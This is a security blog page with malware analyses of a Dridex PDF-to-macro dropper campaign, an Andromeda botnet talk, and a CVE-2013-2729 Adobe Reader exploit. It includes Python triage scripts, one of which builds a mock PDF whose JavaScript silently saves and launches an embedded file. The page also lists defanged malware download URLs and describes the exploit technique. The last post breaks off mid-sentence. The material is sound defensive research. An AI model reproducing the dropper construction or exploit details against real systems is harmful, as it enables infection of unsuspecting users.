<p>eternal-todo.com - Botnets (http://eternal-todo.com/taxonomy/term/79/0)</p>
<p>Dridex spam campaign using PDF as infection vector (http://eternal-todo.com/blog/dridex-spam-campaign-pdf-docm-infection-vector)</p>
<p style="margin-bottom: 0cm" class="rtejustify">During this month a <a href="https://twitter.com/peepdf/status/851563007914250240">Dridex spam campaign using PDF documents</a> as infection vector was spotted. I also received a couple of e-mails in my personal inbox with the mentioned PDF files attached. One of them used the typical &ldquo;scanned data&rdquo; theme (subject <i>&ldquo;Scan data&rdquo;</i>, sender <i>&ldquo;scanner at eternal-todo.com&rdquo;</i>) and the other one posed as a confirmation letter (subject <i>&ldquo;uk_confirmation_ph764968900.pdf&rdquo;</i>, sender <i>&ldquo;info at calmbeginnings.co.uk&rdquo;</i>). Neither of them put much effort into social engineering: just a few words and the attachment.</p>
<p style="margin-bottom: 0cm" class="rtejustify">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_spam_scan_data.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_spam_scan_data_0.png" alt="Dridex Spam Campaign PDF DOCM Scan Data" border="0" height="286" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_spam_confirmation.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_spam_confirmation_0.png" alt="Dridex Spam Campaign PDF DOCM Confirmation Letter" border="0" height="270" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtejustify">Both PDF documents, named <i>&ldquo;Scan_62229.pdf&rdquo;</i> (<a href="https://www.virustotal.com/es/file/4637f33e25203729709d11dba6ecf79c084b92a7da28c1c48c78f30370820f7d/analysis/">81fa2eb97128b6d711158f37698e044f</a>) and <i>&ldquo;uk_confirmation_ph764968900.pdf&rdquo;</i> (<a href="https://www.virustotal.com/es/file/05d144e3473c264646ad5e2fe587fd8e8efa57451dc32c5fcf86a444d38f1c39/analysis/">85066792c8952100ac057055a2f49a8c</a>), had a docm file embedded and used JavaScript code to save and execute the attachment. As you can see in the following image, the <a href="http://help.adobe.com/en_US/acrobat/acrobat_dc_sdk/2015/HTMLHelp/index.html#t=Acro12_MasterBook%2FJS_API_AcroJS%2FDoc_methods.htm%23TOC_exportDataObjectbc-31&amp;rhtocid=_6_1_8_23_1_30">exportDataObject</a> function was called with <i>nLaunch=2</i>, which saves the attachment to a temporary directory AND opens it afterwards without prompting the user for a path. If the argument <i>nLaunch</i> is absent (or 0) the attachment is just saved to disk, without opening it. Adobe Reader still shows a warning dialog before launching a non-PDF attachment, so the infection relies on the user clicking through it. Using <a href="https://github.com/jesparza/peepdf">peepdf</a>'s output it is quite easy to locate the interesting objects (<em>object 11</em> for the JavaScript code and <em>object 3</em> for the embedded document).</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_peepdf_output.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_peepdf_output_0.png" alt="Dridex Spam Campaign PDF DOCM peepdf info" border="0" height="591" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm">Extracting the docm file with <a href="https://eternal-todo.com/tools/peepdf-pdf-analysis-tool">peepdf</a> is as easy as using the <a href="https://github.com/jesparza/peepdf/wiki/Commands"><em><strong>&ldquo;stream&rdquo;</strong></em></a> command together with the &ldquo;greater than&rdquo; sign to save it to disk. Then we can check <a href="https://www.virustotal.com/">VirusTotal</a> with the <em><strong>&ldquo;vtcheck&rdquo;</strong></em> command to see whether it is detected as malicious or not (the command looks up the hash, so the sample itself is not uploaded).</p>
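<p>To make the two previous steps concrete (spotting the <em>exportDataObject</em> call and pulling the embedded file out), here is a small Python scanner. It is an added example, neither peepdf's code nor the malware's: it builds a minimal PDF in memory that mimics the dropper (an /EmbeddedFile stream plus an /OpenAction JavaScript, with no xref table; a constructed sample, not one of the real documents, with made-up object numbers and file names), walks the objects with regular expressions, inflates /FlateDecode streams, reports which objects carry JavaScript and which <em>nLaunch</em> value each <em>exportDataObject</em> call uses, and hands back every embedded file with its MD5 so the hash can be looked up on VirusTotal the way <em>vtcheck</em> does. The <em>nLaunch</em> table mirrors the Acrobat JavaScript API reference linked above.</p>

```python
"""Triage of a PDF dropper that ships a document as /EmbeddedFile and launches
it with exportDataObject(). Added example, not peepdf code; the PDF it scans is
constructed inline."""
import hashlib
import re
import zlib

# Constructed stand-in for the embedded .docm (real ones are OOXML zip containers).
DOCM_BYTES = b"PK\x03\x04" + b"\x00" * 26 + b"constructed-fake-docm-payload"

# Effect of exportDataObject's nLaunch argument (Acrobat JavaScript API reference).
NLAUNCH_MEANING = {
    0: "save only, user is prompted for a path (default when absent)",
    1: "save and launch, user is prompted for a path",
    2: "save to a temp directory and launch, no prompt",
}

OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj\s*(.*?)\s*endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
JS_OBJ_RE = re.compile(rb"/S\s*/JavaScript\b|/JS\b")
EMBEDDED_RE = re.compile(rb"/Type\s*/EmbeddedFile\b")
LAUNCH_RE = re.compile(rb"exportDataObject\s*\(\s*\{([^}]*)\}", re.S)
NLAUNCH_RE = re.compile(rb"nLaunch\s*:\s*(\d+)")


def build_sample_pdf():
    """Constructed PDF mimicking the dropper: a Flate-compressed /EmbeddedFile and
    an /OpenAction JavaScript that saves and launches it. No xref table is
    written (a real reader would rebuild it); the scanner below does not need one."""
    payload = zlib.compress(DOCM_BYTES)
    js = b'this.exportDataObject({cName: "ScanData.docm", nLaunch: 2});'
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R "
        b"/Names << /EmbeddedFiles << /Names [(ScanData.docm) 4 0 R] >> >> >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n"
        % len(payload) + payload + b"\nendstream",
        b"<< /Type /Filespec /F (ScanData.docm) /EF << /F 3 0 R >> >>",
        b"<< /S /JavaScript /JS (" + js + b") >>",
    ]
    out = [b"%PDF-1.7\n"]
    for num, body in enumerate(objects, start=1):
        out.append(b"%d 0 obj\n" % num + body + b"\nendobj\n")
    out.append(b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
    return b"".join(out)


def decode_stream(dictionary, raw):
    """Only /FlateDecode is handled here; anything else is returned undecoded."""
    return zlib.decompress(raw) if b"/FlateDecode" in dictionary else raw


def scan_pdf(data):
    """Return the object numbers carrying JavaScript, every /EmbeddedFile stream
    as (object, md5, bytes) and every exportDataObject call as (object, nLaunch),
    with nLaunch reported as 0 when the argument is absent."""
    findings = {"javascript": [], "embedded_files": [], "launch": []}
    for m in OBJ_RE.finditer(data):
        num, body = int(m.group(1)), m.group(2)
        sm = STREAM_RE.search(body)
        head = body[:sm.start()] if sm else body          # the stream dictionary
        content = decode_stream(head, sm.group(1)) if sm else b""
        if JS_OBJ_RE.search(head):
            findings["javascript"].append(num)
        if sm and EMBEDDED_RE.search(head):
            findings["embedded_files"].append(
                (num, hashlib.md5(content).hexdigest(), content))
        for call in LAUNCH_RE.finditer(head + content):   # JS as string or stream
            nm = NLAUNCH_RE.search(call.group(1))
            findings["launch"].append((num, int(nm.group(1)) if nm else 0))
    return findings


def dump_embedded(findings, directory="."):
    """Equivalent of peepdf's 'stream N > file': write each embedded file to disk,
    named by its md5 so the hash can be checked on VirusTotal without uploading."""
    paths = []
    for num, digest, content in findings["embedded_files"]:
        path = f"{directory}/object{num}_{digest}.bin"
        with open(path, "wb") as fh:
            fh.write(content)
        paths.append(path)
    return paths


if __name__ == "__main__":
    result = scan_pdf(build_sample_pdf())
    print("JavaScript objects:", result["javascript"])
    for num, digest, content in result["embedded_files"]:
        print(f"object {num}: embedded file, {len(content)} bytes, md5 {digest}")
    for num, nlaunch in result["launch"]:
        print(f"object {num}: exportDataObject nLaunch={nlaunch} "
              f"-> {NLAUNCH_MEANING.get(nlaunch, 'unknown value')}")
```

<p>Point <em>scan_pdf</em> at the bytes of a real sample instead of <em>build_sample_pdf()</em> to use it; object streams and non-Flate filters are out of scope here, which is exactly where a full parser like peepdf earns its keep.</p>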
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rtecenter"><a href="/eternal_files/uploads/pdf_docm_dridex_peepdf_extract_file.png" target="_blank"><img src="/eternal_files/uploads/pdf_docm_dridex_peepdf_extract_file_0.png" alt="Dridex Spam Campaign PDF DOCM peepdf extract file" border="0" height="291" width="500" /></a></p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm" class="rteleft">The two docm files extracted from the PDF documents, named <i>&ldquo;ScanData049124.docm&rdquo;</i> (<a href="https://www.virustotal.com/es/file/75728a667dd40d0af0e6b61502d238c3c30e14fe6a738b15455b2dc4fad5ccb5/analysis/">44edff8fa67eb916fda880de42dad708</a>) and <i>&ldquo;20170401907863.docm&rdquo;</i> (<a href="https://www.virustotal.com/es/file/a3d9c11b01aabe9b1c182d438cdf33c4ef4e22a61703d605ada8a6bae0ff9ee4/analysis/">60db2cd260a77934c70c924166cabc5a</a>), are Word documents containing macros. This is the typical infection vector used by cybercriminals nowadays, so I will not go into details here. You can use <a href="https://blog.didierstevens.com/programs/oledump-py/">oledump</a> and other tools to extract and analyze the macros.</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<p style="margin-bottom: 0cm">In this case, the macros downloaded an XOR-encoded executable from one of several URLs, decoded it and executed it to infect the machine. The dropped malware (<a href="https://www.virustotal.com/es/file/1072e9f512abaafc1f510b31bcf56fd668f9f7cf558984052720aa85d311bca7/analysis/">f1fd0a8e9443710df0859109588eb5fa</a> and <a href="https://www.virustotal.com/es/file/6739c782d114307deaac42120a7061f51f9e74a86f1e60664997a269784143f2/analysis/">117da8ef79cb0d96c1c803709bd4827f</a>) was Dridex and, more specifically, these were binaries belonging to botnet 7200. These are the URLs used to download the binaries (some of them were still active at the time of writing):</p>
<p style="margin-bottom: 0cm">&nbsp;</p>
<pre><span style="font-size: x-small;">mentalmysteries[.]com/kjv783r<br />semfamily[.]com/kjv783r<br />perisoft[.]org/kjv783r<br />centralsecuritybureau[.]com/874hv<br />tserv[.]su/874hv<br />kapil[.]50webs[.]com/874hv</span></pre><p style="margin-bottom: 0cm">&nbsp;</p>
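<p>The macros above fetch an XOR-encoded executable. When the key is not obvious from the VBA, it can be recovered from the downloaded blob itself, because the beginning of a PE file is almost entirely known. The Python below is an added example (not the macro's decoder): it assumes the payload was linked with the usual Microsoft DOS stub (the 16-byte DOS header and the &ldquo;This program cannot be run in DOS mode.&rdquo; string at offset 0x4E), lets every known byte vote for a key position, tries key lengths from 1 to 38, and verifies each candidate by checking that <em>e_lfanew</em> points at a PE signature. The sample PE and the key <em>s3cr3tk3y</em> are constructed for the demonstration; nothing here comes from the real Dridex binaries.</p>

```python
"""Recover the repeating XOR key of a downloaded executable by known plaintext.
Added example; the crib (standard DOS stub) and the sample are assumptions."""
import struct

# Known-plaintext cribs. Assumption: the PE was linked with the usual Microsoft
# DOS stub, so its first 16 bytes and the stub message at offset 0x4E are known.
DOS_HEADER_CRIB = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
DOS_STUB_MSG = b"This program cannot be run in DOS mode."
DOS_STUB_MSG_OFFSET = 0x4E

CRIB = {off: byte for off, byte in enumerate(DOS_HEADER_CRIB)}
CRIB.update({DOS_STUB_MSG_OFFSET + i: byte for i, byte in enumerate(DOS_STUB_MSG)})


def xor(data, key):
    """Repeating-key XOR; it is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data):
    """Independent check on a decoded blob: 'MZ' and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob, max_keylen=38):
    """Return the shortest key (up to max_keylen bytes) that turns blob into a
    PE, or None. Every crib offset votes for key[offset % keylen]; a key length
    is rejected as soon as two crib bytes disagree about the same key byte.
    Offsets 0x4E..0x74 cover every residue for keylen <= 38, so all key bytes
    get a vote as long as the blob is at least 0x75 bytes long."""
    for keylen in range(1, max_keylen + 1):
        key = [None] * keylen
        consistent = True
        for off, plain in CRIB.items():
            if off >= len(blob):
                continue
            slot = off % keylen
            k = blob[off] ^ plain
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:
                consistent = False
                break
        if not consistent or None in key:
            continue
        candidate = bytes(key)
        if looks_like_pe(xor(blob, candidate)):
            return candidate
    return None


def build_fake_pe():
    """Constructed 256-byte PE skeleton: DOS header, stub message, e_lfanew -> 'PE'."""
    buf = bytearray(256)
    buf[:len(DOS_HEADER_CRIB)] = DOS_HEADER_CRIB
    struct.pack_into("<I", buf, 0x3C, 0x80)                      # e_lfanew
    buf[DOS_STUB_MSG_OFFSET:DOS_STUB_MSG_OFFSET + len(DOS_STUB_MSG)] = DOS_STUB_MSG
    buf[0x80:0x84] = b"PE\x00\x00"
    buf[0x84:0x86] = b"\x4c\x01"                                 # IMAGE_FILE_MACHINE_I386
    return bytes(buf)


if __name__ == "__main__":
    secret = b"s3cr3tk3y"          # assumed key, used only to build the sample blob
    blob = xor(build_fake_pe(), secret)
    key = recover_xor_key(blob)
    print("recovered key:", key)
    print("decoded blob is a PE:", key is not None and looks_like_pe(xor(blob, key)))
```

<p>If the linker used a different DOS stub the 0x4E crib will be wrong and longer keys will not be recoverable; drop the second crib and lower <em>max_keylen</em> to 16 in that case, or replace it with any other bytes you know for certain (the section names, for instance).</p>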
<p style="margin-bottom: 0cm">Normally there is no useful metadata in malicious PDF files, but in this case the <strong>&quot;metadata&quot;</strong> command shows some information. Apparently the attackers used <a href="https://github.com/itext">iText</a> (its .NET port, iTextSharp) to create the PDF files, and the clock of the machine that created them was set to a UTC+3 time zone. Of course, this information can be faked, but in this case I would say it is accurate ;)&nbsp; <br />
&nbsp;</p>
<pre><span style="font-size: x-small;">&lt;&lt; /Producer iTextSharp? 5.5.10 ?2000-2016 iText Group NV (AGPL-version)<br />/CreationDate D:20170410150016+03'00'<br />/ModDate D:20170410150016+03'00' &gt;&gt;</span></pre><p style="margin-bottom: 0cm">&nbsp;</p>
<pre><span style="font-size: x-small;">&lt;&lt; /Producer iTextSharp? 5.5.10 ?2000-2016 iText Group NV (AGPL-version)<br />/CreationDate D:20170411122518+03'00'<br />/ModDate D:20170411122518+03'00' &gt;&gt;</span></pre><p style="margin-bottom: 0cm">&nbsp;<br />
In the same way that cybercriminals moved back to documents with macros to spread malware, we can see that they have not forgotten PDF files as an infection vector. Many users still regard PDF documents as harmless, and even when a warning dialog pops up they click through it and get infected. Luckily, analysts can still use <a href="https://eternal-todo.com/category/peepdf">peepdf</a> to have a good time playing with these malicious documents ;) Happy hunting!<br />
&nbsp;</p>
<p>Tags: Analysis, Botnets, Dridex, Javascript, Macros, Malware, PDF, peepdf. Published Sun, 23 Apr 2017 23:24:17 +0000 by jesparza (http://eternal-todo.com/blog/dridex-spam-campaign-pdf-docm-infection-vector#comments).</p>
<p>Travelling to the far side of Andromeda at Botconf 2015 (http://eternal-todo.com/blog/travelling-far-side-andromeda-botconf)</p>
<p>It has been a while since I&nbsp;last wrote here and since <a href="https://www.botconf.eu/2015/travelling-to-the-far-side-of-andromeda-2/">I&nbsp;presented at Botconf</a>, but I&nbsp;wanted to share my slides here too. A couple of weeks after the <a href="https://en.wikipedia.org/wiki/November_2015_Paris_attacks">sad terrorist attacks in Paris</a>, <a href="https://twitter.com/botconf">Botconf</a> was held in the city of love. Way more secure than before and with lots of security controls, which almost made me miss my return train, but it was worth it. Attending a security conference focused on cybercrime, malware, reverse engineering and intelligence is always a good plan :) I really recommend attending <a href="https://twitter.com/Botconf/status/672801529284444160">Botconf this year in Lyon</a>, you will not regret it ;)</p>
<p>My presentation was about Andromeda. This is the abstract:<br />
&nbsp;</p>
<blockquote> Andromeda, also known as Gamarue by some antivirus vendors, is a popular and modular bot active since 2011. It is normally used to spread additional malware, but sometimes, depending on the criminals, the main objective could be just stealing user credentials. After almost five years of life its development has not stopped. The people behind it keep maintaining it and adding functionalities, like new anti-analysis routines, changes in the communication encryption, new request formats, etc.<br />
&nbsp; <br />
This talk will not just give details about the latest changes in the Andromeda binary and control panel, but it will also answer some interesting questions about this botnet. Which are the most popular versions used nowadays? Are most of the botnets spreading malware or just using its plugins? What are the most popular plugins? How and where is Andromeda sold? Who is selling it? What criminal groups are using Andromeda? It is not just a talk about malware reversing but about the whole Andromeda ecosystem.</blockquote>
<p>&nbsp;</p>
<div class="rtejustify">Since the first time I&nbsp;analyzed Andromeda <a href="http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis">back in 2013</a> I&nbsp;have kept an eye on the new versions. Last year I&nbsp;published another blog post with some <a href="http://eternal-todo.com/blog/andromeda-gamarue-loves-json">details about the new JSON version</a>, and since then I&nbsp;have been tracking some Andromeda botnets at work, together with my <a href="https://www.fox-it.com/intell/">Fox-IT InTELL</a> colleagues. Thanks to this work we were able to spot some interesting botnets, like the one used by the <a href="https://www.fox-it.com/en/files/2014/12/Anunak_APT-against-financial-institutions2.pdf">Anunak group</a> or the one used by Smilex (<a href="http://www.justice.gov/opa/pr/bugat-botnet-administrator-arrested-and-malware-disabled">Dridex operator arrested last year in Cyprus</a>) to distribute his spam bot. Besides that, I showed some statistics about the botnets we saw, interesting plugins being spread like the spammer (Jahoo/Otlard) <a href="http://malware.dontneedcoffee.com/2015/11/inside-jahoo-otlarda-botnet-dedicated.html">mentioned by Kafeine some days before my presentation</a>, some funny comments about the anti-analysis techniques used by Andromeda and some details about the actors behind Andromeda. Unfortunately, some of this information was only shared at Botconf and is not for public distribution.</div>
<p>
This is the public version of my slides (you can <a href="http://eternal-todo.com/files/presentations/Travelling%20to%20the%20far%20side%20of%20Andromeda%20-%20Botconf%202015.pdf">download them here</a> and also <a href="https://www.botconf.eu/wp-content/uploads/2015/12/OK-P07-Jose-Esparza-Travelling-to-the-far-side-of-Andromeda-2.pdf">from the Botconf site</a>):<br />
&nbsp;</p>
<div class="rtecenter">
<div style="margin-bottom:5px"><strong> <a target="_blank" title="Travelling to the far side of Andromeda" href="//www.slideshare.net/eternaltodo/travelling-to-the-far-side-of-andromeda">Travelling to the far side of Andromeda</a> </strong> from <strong><a target="_blank" href="//www.slideshare.net/eternaltodo">Jose Miguel Esparza</a></strong></div>
<div class="rteleft">&nbsp; <br />
Taking a look at the slides is not as exciting as attending the presentation, hehe, but I&nbsp;think it is enough to get a good idea of the subject and the things I&nbsp;discussed there. If you have any questions or comments, feel free, shoot! Email is fine too if you are shy ;) And remember: Botconf, Lyon, 29th of November ;) See you there!</div>
</div>
<p>Tags: Actors, Andromeda, Botconf, Botnets, Conferences, Intelligence, Malware, Reversing. Published Sun, 07 Feb 2016 21:09:54 +0000 by jesparza (http://eternal-todo.com/blog/travelling-far-side-andromeda-botconf#comments).</p>
<p>Spammed CVE-2013-2729 PDF exploit dropping ZeuS-P2P/Gameover (http://eternal-todo.com/blog/cve-2013-2729-exploit-zeusp2p-gameover)</p>
<div class="rtejustify">I am used to receiving spam emails containing zips and exes, even &quot;PDF files&quot; with a double extension (<em>.pdf.exe</em>), but some days ago I received an email with a real PDF file attached, without any <em>.exe</em> extension, and it did not look like a Viagra advertisement. Weird. I did not have time to take a look at it, but the next day I received another one, with a different subject. The subject of the first email was &ldquo;<em>Invoice 454889 April</em>&rdquo; from <em>Sue Mockridge (motherlandjjw949 at gmail.com)</em>, attaching <em>&ldquo;April invoice 819953.pdf&rdquo;</em> (eae0827f3801faa2a58b57850f8da9f5), and the second one &ldquo;<em>Image has been sent jesparza</em>&rdquo; from <em>Evernote Service</em> (<em>message at evernote.com</em>, but really <em>protectoratesl9 at gmail.com</em>), attaching <em>&ldquo;Agreemnet-81220097.pdf&rdquo; (2a03ac24042fc35caa92c847638ca7c2)</em>.</div>
<p>&nbsp;</p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/01_cve-2013-2729_invoice_email.png"><img border="0" width="425" height="306" alt="cve-2013-2729_invoice_email" src="/eternal_files/uploads/01_cve-2013-2729_invoice_email_0.png" /></a></div>
<p>&nbsp;</p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/02_cve-2013-2729_evernote_email.png"><img border="0" width="425" height="305" alt="cve-2013-2729_evernote_email" src="/eternal_files/uploads/02_cve-2013-2729_evernote_email_0.png" /></a></div>
<p>&nbsp;<br />
At this point I was really curious so I took a look at them with <a href="http://peepdf.eternal-todo.com/"><em><strong>peepdf</strong></em></a>. <br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/03_cve-2013-2729_peepdf_error.png"><img border="0" width="425" height="345" alt="cve-2013-2729_peepdf_error" src="/eternal_files/uploads/03_cve-2013-2729_peepdf_error_0.png" /></a></div>
<p>&nbsp;<br />
At that moment I only saw a suspicious <em>/AcroForm</em> element, but nothing more. This element was referencing object 1, not shown due to a bug in <a href="https://twitter.com/peepdf"><em><strong>peepdf</strong></em></a>.<br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/04_cve-2013-2729_xfa_form.png"><img border="0" width="425" height="367" alt="cve-2013-2729_xfa_form" src="/eternal_files/uploads/04_cve-2013-2729_xfa_form_0.png" /></a></div>
<p>&nbsp; </p>
<div class="rtejustify">I had to fix it to see the important stream (object 1), encoded twice with <em>/FlateDecode</em> but written with the abbreviated filter name (<em>[/Fl /Fl]</em>). The PDF specification only defines these abbreviations for inline images, but Adobe Reader accepts them on ordinary streams too, which makes them a cheap way to trip up naive parsers and signatures. It was an XFA form, containing JavaScript code and an image encoded in Base64. After extracting the stream to a file it had an unusual size, 85MB. Small, eh? ;) Besides the four script elements, the culprit of this size was the encoded image, a BMP file with a repeating pattern, <em>&ldquo;\x00\x02\xff\x00&rdquo;</em> (in RLE8 encoding <em>00 02 dx dy</em> is the &ldquo;delta&rdquo; escape, which moves the cursor without drawing anything).</div>
<p>&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/05_cve-2013-2729_bmp_exploit.png"><img border="0" width="450" height="251" alt="cve-2013-2729_bmp_exploit" src="/eternal_files/uploads/05_cve-2013-2729_bmp_exploit_0.png" /></a></div>
<p>&nbsp; </p>
<div class="rtejustify">With this information and thanks to other characteristic strings found in this object (<em>&ldquo;0aa46f9b-2c50-42d4-ab0b-1a1015321da7&rdquo;, &ldquo;// Index of the overlapped string&rdquo;, &ldquo;// Base of the AcroRd32_dll&rdquo;</em>, etc.) it was easy to spot the vulnerability exploited here. It turned out to be the <em>Adobe Reader BMP/RLE heap corruption vulnerability (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729">CVE-2013-2729</a>)</em>, and <a href="https://github.com/feliam/CVE-2013-2729/blob/master/XFABMPExploit.py">the bad guys copied the PoC written by Felipe Manzano</a> (it was not the first time that attackers reused code from <a href="https://twitter.com/feliam">Felipe</a>, for example <a href="http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf">in the case of a CVE-2011-2462 exploit</a>). I&nbsp;have to be fair and mention that the bad guys made some extra effort to add more ROP offsets to cover 23 different Adobe Reader versions, from 9.3.0.3 to 11.0.0.1 ;) The vulnerability itself is an <a href="http://www.adobe.com/support/security/bulletins/apsb13-15.html">integer overflow patched one year ago</a> and explained really well by Felipe in this <a href="http://blog.binamuse.com/2013/05/readerbmprle.html">blog post</a> and <a href="http://www.binamuse.com/papers/XFABMPReport.pdf">whitepaper</a>, so nothing to add here.</div>
<p>
Knowing all the details about the exploit it was easy to make <a href="http://code.google.com/p/peepdf/"><em><strong>peepdf</strong></em></a> detect it (update it using the -u flag!):<br />
&nbsp; </p>
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/06_cve-2013-2729_peepdf_detection.png"><img border="0" width="425" height="331" alt="cve-2013-2729_peepdf_detection" src="/eternal_files/uploads/06_cve-2013-2729_peepdf_detection_0.png" /></a></div>
<p>&nbsp; <br />
The shellcode was not hidden at all; it sat in plain sight within one of the script elements, so it was easy to decode with the <em>js_unescape</em> command, which turns the <em>%uXXXX</em>-escaped string into raw bytes. <br />
&nbsp;</p>
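<p>As an added example covering the two steps above (decoding the doubly-Flated XFA stream written with abbreviated filter names, and unescaping the shellcode string), the Python below re-implements just the bits of the triage that were needed here. It is not peepdf's code: it expands abbreviations such as <em>/Fl</em>, decodes a filter chain, extracts the <em>script</em> and <em>image</em> elements of the XFA template, turns a <em>%uXXXX</em> literal into bytes (what <em>js_unescape</em> does) and summarises the BMP so that a file consisting of one repeated RLE escape stands out immediately. The stream it works on is constructed inline (a fake XFA template with a short script and a 4096-run RLE8 BMP), not the real object 1, and the BMP header values are invented.</p>

```python
"""Triage of an XFA-based exploit PDF stream: abbreviated filter chain, script
and image extraction, %u-unescaping and an RLE BMP summary. Added example,
not peepdf's code; the stream is constructed inline."""
import base64
import re
import struct
import zlib
from collections import Counter

# Abbreviated filter names; the spec only allows them in inline images, but
# Adobe Reader accepts them on any stream, which is why malware uses them.
FILTER_ALIASES = {b"/Fl": b"/FlateDecode", b"/AHx": b"/ASCIIHexDecode",
                  b"/A85": b"/ASCII85Decode", b"/RL": b"/RunLengthDecode"}
BI_RLE8 = 1    # biCompression value of an 8-bit run-length encoded bitmap


def parse_filters(dictionary):
    """Filter chain of a stream dictionary, e.g. '/Filter [/Fl /Fl]' -> two Flate passes."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/\w+)", dictionary)
    if not m:
        return []
    return [FILTER_ALIASES.get(n, n) for n in re.findall(rb"/\w+", m.group(1))]


def decode_stream(dictionary, raw):
    """Apply the filter chain in order; only Flate is implemented here."""
    data = raw
    for name in parse_filters(dictionary):
        if name != b"/FlateDecode":
            raise NotImplementedError(name.decode())
        data = zlib.decompress(data)
    return data


def xfa_parts(xml):
    """Script bodies and base64-decoded <image> payloads of an XFA template."""
    scripts = re.findall(rb"<script[^>]*>(.*?)</script>", xml, re.S)
    images = [base64.b64decode(b"".join(body.split()))
              for body in re.findall(rb"<image[^>]*>(.*?)</image>", xml, re.S)]
    return scripts, images


def js_unescape(text):
    """Same job as peepdf's js_unescape: '%uXXXX' -> 2 little-endian bytes, '%XX' -> 1 byte."""
    out, i = bytearray(), 0
    while i < len(text):
        if text.startswith("%u", i):
            out += int(text[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif text[i] == "%":
            out.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(ord(text[i]) & 0xFF)
            i += 1
    return bytes(out)


def bmp_summary(bmp):
    """Header fields plus the most frequent 4-byte chunk of the pixel data, so a
    bitmap made of one repeated RLE escape is obvious from the summary alone."""
    if bmp[:2] != b"BM":
        return None
    off_bits = struct.unpack_from("<I", bmp, 10)[0]                 # bfOffBits
    width, height, _planes, bpp, compression = struct.unpack_from("<iiHHI", bmp, 18)
    chunks = Counter(bmp[i:i + 4] for i in range(off_bits, len(bmp) - 3, 4))
    top, count = chunks.most_common(1)[0] if chunks else (b"", 0)
    total = sum(chunks.values())
    return {"width": width, "height": height, "bpp": bpp, "compression": compression,
            "top_pattern": top, "top_fraction": count / total if total else 0.0}


def triage(dictionary, raw):
    xml = decode_stream(dictionary, raw)
    scripts, images = xfa_parts(xml)
    shellcode = [js_unescape(lit.decode()) for s in scripts
                 for lit in re.findall(rb'unescape\("([^"]*)"\)', s)]
    return {"filters": parse_filters(dictionary), "scripts": len(scripts),
            "shellcode": shellcode, "images": [bmp_summary(i) for i in images]}


def build_sample_stream(runs=4096):
    """Constructed object-1 lookalike: XFA XML with one script and an RLE8 BMP whose
    pixel data is nothing but '00 02 ff 00' (the RLE delta escape: move the cursor
    by dx=255, dy=0 without drawing), compressed twice and tagged [/Fl /Fl]."""
    pixels = b"\x00\x02\xff\x00" * runs + b"\x00\x01"      # deltas, then end-of-bitmap
    info = struct.pack("<IiiHHIIiiII", 40, 4096, 64, 1, 8, BI_RLE8, len(pixels), 0, 0, 0, 0)
    bmp = (b"BM" + struct.pack("<IHHI", 14 + len(info) + len(pixels), 0, 0, 14 + len(info))
           + info + pixels)
    xml = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template>'
           b'<script contentType="application/x-javascript">'
           b'var shellcode = unescape("%u9090%u9090%ucccc");</script>'
           b'<image contentType="image/bmp">' + base64.b64encode(bmp)
           + b'</image></template></xdp:xdp>')
    raw = zlib.compress(zlib.compress(xml))
    return b"<< /Filter [/Fl /Fl] /Length %d >>" % len(raw), raw


if __name__ == "__main__":
    dictionary, raw = build_sample_stream()
    print(triage(dictionary, raw))
```

<p>On a real sample, feed <em>triage</em> the stream dictionary and raw bytes of the suspicious object; a <em>top_fraction</em> close to 1.0 on an RLE8 image whose top pattern is an escape code is a strong signal that the bitmap exists only to drive the decoder.</p>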
<div class="rtecenter"><a target="_blank" href="/eternal_files/uploads/07_cve-2013-2729_shellcode.png"><img border="0" width="425" height="302" alt="cve-2013-2729_shellcode" src="/eternal_files/uploads/07_cve-2013-2729_shellcode_0.png" /></a></div>
<p>&nbsp; <br />
In both PDF files the shellcode tried to download an executable from a compromised web site:<br />
&nbsp;</p>
